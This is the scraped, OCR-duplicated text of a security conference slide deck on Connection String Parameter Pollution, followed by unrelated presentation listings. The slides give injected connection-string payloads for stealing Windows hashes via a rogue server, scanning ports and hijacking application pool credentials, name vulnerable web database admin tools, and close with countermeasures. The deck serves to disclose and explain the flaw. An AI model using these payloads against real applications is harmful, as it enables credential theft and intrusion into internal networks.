p chema alonso chema alonso inform tica 64 inform tica 64
play

p Chema Alonso Chema Alonso Informtica 64 Informtica 64 Connection - PowerPoint PPT Presentation

Jun 15, 2023 •130 likes •520 views

p Chema Alonso Chema Alonso Informtica 64 Informtica 64 Connection Strings Connection Strings Define the way an application connects to Define the way an application connects to data repository There are connection strings for:

  1. p Chema Alonso Chema Alonso Informática 64 Informática 64

  2. Connection Strings Connection Strings • Define the way an application connects to Define the way an application connects to data repository • There are connection strings for: • There are connection strings for: – Relational Databases (MSSQL, Oracle, MySQL,…) – LDAP Directories LDAP Di i – Files – Etc…

  3. Databases Connection Strings Databases Connection Strings Data Source = myServerAddress; Data Source = myServerAddress; Initial Catalog = myDataBase; Initial Catalog myDataBase; User Id = myUsername; Password = myPassword;

  4. Google Hacking Google Hacking

  5. Google Hacking Google Hacking

  6. UDL (Universal Data Links) Files UDL (Universal Data Links) Files

  7. Credentials Credentials Operating System Accounts Operating System Accounts Database Credentials Database Credentials Data Source = Data Source = myServerAddress; myServerAddress; Initial Catalog = myDataBase; Initial Catalog = myDataBase; User Id = myUsername; User Id = myUsername; Password = myPassword; Password = myPassword; Integrated Security = Integrated Security = No; SSPI/True/Yes; SSPI/True/Yes;

  8. Users autheticated by Web App Web application manages the login process 1. ‐ Web applicaton connects using its Syslogins Connection string credentials to the credentials to the database. 2. ‐ Asks user login information. i f ti Select id from users Custom 3. ‐ Checks login users table information about info stored in custom users table. Database Engine App running on Web Server

  9. Users autheticated by Database Database engine manages the login process 1. ‐ Web application asks for credentials. 2. ‐ A connection string 2 i i is composed with the credentials to connect Connection string Syslogins to the database. 3. ‐ Roles and permits are limited by the user used in the connection sed in the connection string Database Engine App running on Web Server

  10. Connection String Attacks Connection String Attacks • It´s possible to inject parameters into connection It s possible to inject parameters into connection strings using semi colons as separators Data Source = myServerAddress; I iti l C t l Initial Catalog = myDataBase; D t B Integrated Security = NO; User Id = myUsername; Password = myPassword; Encryption = Off;

  11. ConnectionStringBuiler ConnectionStringBuiler • Available in .NET Framework 2.0 • Build secure connection strings using parameters • It´s not possible to inject into the connection string

  12. Are people aware of this? Are people aware of this?

  13. Connection String Parameter Pollution Connection String Parameter Pollution • The goal is to inject parameters in the connection e goa s to ject pa a ete s t e co ect o string, whether they exist or not • Had duplicated a parameter, the last value wins • This behavior allows attackers to re ‐ write completly the connection string, therefore to manipulate the way the appliation will work and how should be the it authenticated

  14. Pollutionable Behavior Pollutionable Behavior Param1=Value A Param1=Value A Param2=Value B Param2=Value B Param1=Value C Param1=Value C Param2=Value D Param2=Value D DBConnection Object Param1 Param1 Param2

  15. What can be done with CSPP? Rewrite a parameter Data Source=DB1 Data Source=DB1 UID=sa UID=sa password=Pwnd! password=Pwnd! Data Source=DB2 Data Source=DB2 DBConnection Object DataSource DataSource UID password

  16. Scanning the DMZ Scanning the DMZ Finnacial Test Forgotten Development Database 1 Database Database Database Data Web app Source Production Production Internet I t t FW vulnerable Database to CSPP

  17. Port Scanning a Server Port Scanning a Server DataSource DataSource DB1,80 DB1,21 DB1,25 Web app Internet Production vulnerable Database FW to CSPP to CSPP DB1 1445 DB1,1445 Server

  18. What can be done with CSPP? Add a parameter dd Data Source=DB1 Data Source=DB1 UID=sa UID=sa password=Pwnd! password=Pwnd! Integrated Security=True Integrated Security=True DBConnection Object DataSource UID password password

  19. CSPP Attack 1: Hash stealing CSPP Attack 1: Hash stealing 1 ‐ Run a Rogue Server on an accessibl IP address: 1. Run a Rogue Server on an accessibl IP address: Rogue_Server 2 Activate a sniffer to catch the login process 2. ‐ Activate a sniffer to catch the login process Cain/Wireshark 3. ‐ Duplicate Data Source parameter Data_Source=Rogue_Server 4. ‐ Force Windows Integrated Authentication Integrated Security=true g y

  20. CSPP Attack 1: Robo de Hash CSPP Attack 1: Robo de Hash Data source = SQL2005; initial catalog = db1; Data source SQL2005; initial catalog db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password Value ’+; Password=+ Password_Value +; Data source = SQL2005; initial catalog = db1; D t SQL2005 i iti l t l db1 Integrated Security=no; user id= ;Data S Source=Rogue_Server ; R S Password= ;Integrated Security=True ;

  21. CSSP 1:ASP.NET Enterprise Manager CSSP 1:ASP.NET Enterprise Manager

  22. CSPP Attack 2: Port Scanning CSPP Attack 2: Port Scanning 1 ‐ Duplicate the Data Source parameter setting 1. Duplicate the Data Source parameter setting on it the Target server and target port to be scanned scanned. Data_Source=Target_Server,target_Port 2 Check the error messages: 2. ‐ Check the error messages: ‐ No TCP Connection ‐ > Port is opened ‐ No SQL Server ‐ > Port is closed ‐ SQL Server ‐ > Invalid Password

  23. CSPP Attack 2: Port Scanning CSPP Attack 2: Port Scanning Data source = SQL2005; initial catalog = db1; Data source SQL2005; initial catalog db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password Value ’+; Password=+ Password_Value +; Data source = SQL2005; initial catalog = db1; D t SQL2005 i iti l t l db1 Integrated Security=no; user id= ;Data S Source=Target_Server, Target_Port ; T t S T t P t Password= ;Integrated Security=True ;

  24. CSPP 2: myLittleAdmin CSPP 2: myLittleAdmin Port is Opened Port is Opened

  25. CSPP 2: myLittleAdmin CSPP 2: myLittleAdmin Port is Closed Port is Closed

  26. CSPP Attack 3: Hijacking Web Credentials CSPP Attack 3: Hijacking Web Credentials 1 ‐ Duplicate Data Source parameter to the 1. Duplicate Data Source parameter to the target SQL Server Data Source=Target Server Data_Source=Target_Server 2. ‐ Force Windows Authentication Integrated Security=true 3. ‐ Application pool in which the web app is pp p pp running on will send its credentials in order to log in to the database engine. g g

  27. CSPP Attack 3: Hijacking Web Credentials CSPP Attack 3: Hijacking Web Credentials Data source = SQL2005; initial catalog = db1; Data source SQL2005; initial catalog db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password Value ’+; Password=+ Password_Value +; Data source = SQL2005; initial catalog = db1; D t SQL2005 i iti l t l db1 Integrated Security=no; user id= ;Data S Source=Target_Server ; T t S Password= ;Integrated Security=true ;

  28. CSPP Attack 3: Web Data Administrator CSPP Attack 3: Web Data Administrator

  29. CSPP Attack 3: myLittleAdmin/myLittleBackup l d / l k

  30. CSPP Attack 3: ASP.NET Enterprise Manager CSPP Attack 3: ASP.NET Enterprise Manager

  31. Other Databases Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application, although • Port Scanning • Connect to internal/testing/for developing Databases • Oracle supports integrated authority running on Windows and UNIX/Linux servers d UNIX/Li – It´s possible to perform all described attacks • Hash stealing • Port Scanning P t S i • Hijacking Web credentials – Also it´s possible to elevate a connection to sysdba in order to shutdown/startup an instance shutdown/startup an instance

  33. myLittleAdmin/myLittleBackup myLittleAdmin/myLittleBackup myLittleTools released a secury advisory and a patch about this

  34. ASP.NET Enterprise Manager ASP.NET Enterprise Manager • ASP.NET Enterprise Manager is “abandoned”, but it´s been used in a lot of web Control Panels. • Fix the code yourself Fix the code yourself

  35. ASP.NET Enterprise Manager ASP.NET Enterprise Manager • ASP.NET Enterprise Manager is “abandoned”, but it´s been used in a lot of web Control Panels been used in a lot of web Control Panels. • Fix the code yourself h lf

  36. ASP.NET Web Data Admistrator ASP.NET Web Data Admistrator ASP Web Data Administrator is secure in CodePlex web site, but not in Microsoft web site where is been published an unsecure old version

  37. Countermeasures Countermeasures • Harden your firewall a de you e a – Outbound connections • Harden your internal accounts y – Web application – Web server – Database Engine • Use ConnectionStringBuilder • Filter the ;)

  38. Questions? Questions? Contacto Chema Alonso chema@informatica64.com http://www.informatica64.com http://elladodelmal.blogspot.com Palako palakko@lateatral.com Authors Chema Alonso Manuel Fernández “The Sur” Alejandro Martín Bailón Antonio Guzmán

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Chema Alonso, Enrique Rando Metadata: Information stored to give information about the

Chema Alonso, Enrique Rando Metadata: Information stored to give information about the

Chema Alonso, Enrique Rando Metadata: Information stored to give information about the document. For example: Creator, Organization, etc.. Hidden information: Information internally stored by programs and not editable. For

964 views • 57 slides
C OORDINATING GIS S CHEMA W ORKING WITH M ULTIPLE J URISDICTIONS Andrew Newsome, Jonathan Heiss,

C OORDINATING GIS S CHEMA W ORKING WITH M ULTIPLE J URISDICTIONS Andrew Newsome, Jonathan Heiss,

C OORDINATING GIS S CHEMA W ORKING WITH M ULTIPLE J URISDICTIONS Andrew Newsome, Jonathan Heiss, Alan Cunningham September 2, 2015 DCMP F ACTS (D ULLES C ORRIDOR M ETRORAIL P ROJECT ) Seamless integration with current 106-mile Metro system.

803 views • 42 slides
Workload Characterization of 3D Games Jordi Roca, Victor Moya, Carlos Gonzlez, Chema Solis,

Workload Characterization of 3D Games Jordi Roca, Victor Moya, Carlos Gonzlez, Chema Solis,

Workload Characterization of 3D Games Jordi Roca, Victor Moya, Carlos Gonzlez, Chema Solis, Agustn Fernandez and Roger Espasa (Intel DEG Barcelona) Computer Architecture Department 1 Outline Introduction Game selection &

460 views • 27 slides
PO POLI LITI TICA CAL L LAN LANDS DSCA CAPE PE Washingtons political dynamic is

PO POLI LITI TICA CAL L LAN LANDS DSCA CAPE PE Washingtons political dynamic is

PO POLI LITI TICA CAL L LAN LANDS DSCA CAPE PE Washingtons political dynamic is fractured House actions are tempered by conservative pressure and tight Democratic majority in the Senate and President Obama Demonstrating business

686 views • 37 slides
Inteligncia Artificial: Cincia, Negcios e tica Luis Lamb, Ph.D. Ttulo do captulo

Inteligncia Artificial: Cincia, Negcios e tica Luis Lamb, Ph.D. Ttulo do captulo

Inteligncia Artificial: Cincia, Negcios e tica Luis Lamb, Ph.D. Ttulo do captulo Novembro de 2018 Pr-Reitor de Pesquisa - UFRGS Sumrio Um pouco de Histria I.A., computao e impactos sociais Business: Reality

621 views • 60 slides
BI BIG PI PICTURE CTURE IN N STATIS TISTI TICA CAL FRAME AME A DATA VI VISUALIZA

BI BIG PI PICTURE CTURE IN N STATIS TISTI TICA CAL FRAME AME A DATA VI VISUALIZA

BI BIG PI PICTURE CTURE IN N STATIS TISTI TICA CAL FRAME AME A DATA VI VISUALIZA ALIZATI TION ON PR PROJECT OJECT OF OF ELECTRONIC RESOURCES PRICE CHANGES IN ACADEM ADEMIC IC LIBR BRAR ARIES IES Chen eng g Chen eng,

576 views • 28 slides
de la Pobreza Sabina Alkire (OPHI) Motivacin tica ca Las vidas humanas son maltratadas y

de la Pobreza Sabina Alkire (OPHI) Motivacin tica ca Las vidas humanas son maltratadas y

La Medicin Multidimensional de la Pobreza Sabina Alkire (OPHI) Motivacin tica ca Las vidas humanas son maltratadas y disminudas en una gran diversidad de formas . Amartya Sen Visin in de conjun junto to Mientras que

1.33k views • 106 slides
Tribes Treaties and Time Presented to 15 th Annual ILPC/TICA Indigenous Law Conference Heather

Tribes Treaties and Time Presented to 15 th Annual ILPC/TICA Indigenous Law Conference Heather

Tribes Treaties and Time Presented to 15 th Annual ILPC/TICA Indigenous Law Conference Heather Whiteman Runs Him, Senior Staff Attorney Native American Rights Fund November 15, 2018 Herreras case Clayvin Herrera, a Crow tribal citizen, and

517 views • 14 slides
Global eStandards and Web Architectures for eGovernment projects Jos M. Alonso,

Global eStandards and Web Architectures for eGovernment projects Jos M. Alonso,

Global eStandards and Web Architectures for eGovernment projects Jos M. Alonso, <josema@w3.org> eGovernment and W3C Jos M. Alonso CTIC Fellow - W3C eGovernment Lead Technology and Society Domain 28 May 2007 These slides:

525 views • 21 slides
Inform 7 The Hall is a room. Inform 7 Logic based programming Similar to Prolog

Inform 7 The Hall is a room. Inform 7 Logic based programming Similar to Prolog

C152 Programming Language Paradigms Prof. Tom Austin, Fall 2014 Inform 7 The Hall is a room. Inform 7 Logic based programming Similar to Prolog Inform 6 (and earlier) were procedural languages Inform 7 is a domain specific

550 views • 23 slides
Optimal Transportation and Equilibria on Wireless Networks Alonso SILVA alonso.silva@inria.fr

Optimal Transportation and Equilibria on Wireless Networks Alonso SILVA alonso.silva@inria.fr

INRIA Optimal Transportation and Equilibria on Wireless Networks Alonso SILVA alonso.silva@inria.fr (joint work with H. Tembine) POPEYE meeting - April 09, 2009 Optimal Transportation 1 Mass transportation The theory of mass transportation

463 views • 17 slides
Ready for 100% Renewable Energy Allyson Samuell, Tica Douglas, Allen Armstrong Ready for 100% -

Ready for 100% Renewable Energy Allyson Samuell, Tica Douglas, Allen Armstrong Ready for 100% -

Ready for 100% Renewable Energy Allyson Samuell, Tica Douglas, Allen Armstrong Ready for 100% - Vision & Values VISION We envision a world powered by clean, renewable energy, like solar and wind, where all electricity, buildings and

430 views • 16 slides
Snapshot Isolation Christian Plattner, Gustavo Alonso Exercises for Verteilte Systeme WS05/06

Snapshot Isolation Christian Plattner, Gustavo Alonso Exercises for Verteilte Systeme WS05/06

Snapshot Isolation Christian Plattner, Gustavo Alonso Exercises for Verteilte Systeme WS05/06 Swiss Federal Institute of Technology (ETH), Zrich {plattner,alonso}@inf.ethz.ch 27.01.2006 Today Reminder: Traditional Concurrency Control in

551 views • 40 slides
Outline: Outline: -Motivations of GAPI Lib -Why GAs? -Structure of GAs - GAPI Lib architecture

Outline: Outline: -Motivations of GAPI Lib -Why GAs? -Structure of GAs - GAPI Lib architecture

An Approach Approach to to the the Calibration Calibration of of An Modelica Models Models Modelica M.A M.A. Rubio, A. Urquia, S. Dormido . Rubio, A. Urquia, S. Dormido EOOLT 2007 EOOLT 2007 Departamento de Inform tica y Autom

354 views • 10 slides
Improving Government through Better Use of the Web Jos M. Alonso <josema@w3.org>

Improving Government through Better Use of the Web Jos M. Alonso <josema@w3.org>

Improving Government through Better Use of the Web Jos M. Alonso <josema@w3.org> eGovernment Lead, W3C/CTIC Disclaimers Formal work has just started We dont have the solutions! trying to identify the challenges Not yet the view of

595 views • 37 slides
Data Management Systems Fall Semester 2020 Gustavo Alonso Institute of Computing Platforms

Data Management Systems Fall Semester 2020 Gustavo Alonso Institute of Computing Platforms

Data Management Systems Fall Semester 2020 Gustavo Alonso Institute of Computing Platforms Administrative Introduction Department of Computer Science ETH Zrich Administrative Introduction 1 About us Prof. Gustavo Alonso Systems

490 views • 17 slides
Java Technologies Resources and JNDI The Context How to access all these resources in a similar

Java Technologies Resources and JNDI The Context How to access all these resources in a similar

Java Technologies Resources and JNDI The Context How to access all these resources in a similar manner? A resource is a program object that provides connections to other systems such as: database servers, messaging systems, etc. Naming

463 views • 28 slides
Food Access Programs, Farm Sales, & Farmers Market Viability Colleen Donovan Washington

Food Access Programs, Farm Sales, & Farmers Market Viability Colleen Donovan Washington

Food Access Programs, Farm Sales, & Farmers Market Viability Colleen Donovan Washington State Farmers Market Association (WSFMA) colleen@wafarmersmarkets.org SNAP Programming to Support Farmers & Engage Consumers September 17,

387 views • 26 slides
Parcel Delivery - Dr. Henrik Ballebye Okholm Ninth bi-annual Postal Economics Conference,

Parcel Delivery - Dr. Henrik Ballebye Okholm Ninth bi-annual Postal Economics Conference,

E-commerce and Parcel Delivery - Dr. Henrik Ballebye Okholm Ninth bi-annual Postal Economics Conference, Toulouse 1st April 2016 E-commerce and Parcel Delivery Agenda Policy context E-commerce development Consumer demand Parcel

728 views • 41 slides
Number Theory Divisibility, GCD, primes Brandon Zhang 2020/03/12 University of British Columbia

Number Theory Divisibility, GCD, primes Brandon Zhang 2020/03/12 University of British Columbia

Number Theory Divisibility, GCD, primes Brandon Zhang 2020/03/12 University of British Columbia Guest lecturer: Brandon Zhang Undergraduate in CS and math ICPC 2019 World Finalist 2 Facebook intern Taught CS490 in 2018W2 1

668 views • 25 slides
Description Logics for Accessing Data Diego Calvanese KRDB Research Centre for Knowledge and Data

Description Logics for Accessing Data Diego Calvanese KRDB Research Centre for Knowledge and Data

Description Logics for Accessing Data Diego Calvanese KRDB Research Centre for Knowledge and Data Free University of Bozen-Bolzano, Italy Currently on sabbatical leave at Technical University Vienna, Austria EPCL Basic Training Camp 2012/2013

1.09k views • 74 slides
WP6: Query Transformation WP6 Team Presented by: Diego Calvanese Free University of

WP6: Query Transformation WP6 Team Presented by: Diego Calvanese Free University of

WP6: Query Transformation WP6 Team Presented by: Diego Calvanese Free University of Bozen-Bolzano, Italy Free University of Bozen-Bolzano Optique Y3 Review 09/12/2015 Munich, Germany T6.1 Transformation System Configuration T6.2 Runtime

670 views • 48 slides
VTK: The Visualiza.on Toolkit Part II: Visualiza.on Model

VTK: The Visualiza.on Toolkit Part II: Visualiza.on Model

VTK: The Visualiza.on Toolkit Part II: Visualiza.on Model Han-Wei Shen The Ohio State University VTK Visualiza.on Model Graphics and Visualiza.on

681 views • 25 slides
Front-end RESTful Back- end Connection Connecting AngularJS Front-end with RESTful Express-Node

Front-end RESTful Back- end Connection Connecting AngularJS Front-end with RESTful Express-Node

Front-end RESTful Back- end Connection Connecting AngularJS Front-end with RESTful Express-Node Back-end CORS CORS : Cross-Origin Resource Sharing Cross-Origin Request : A resource makes a cross- origin HTTP request when it requests a

397 views • 14 slides

More recommend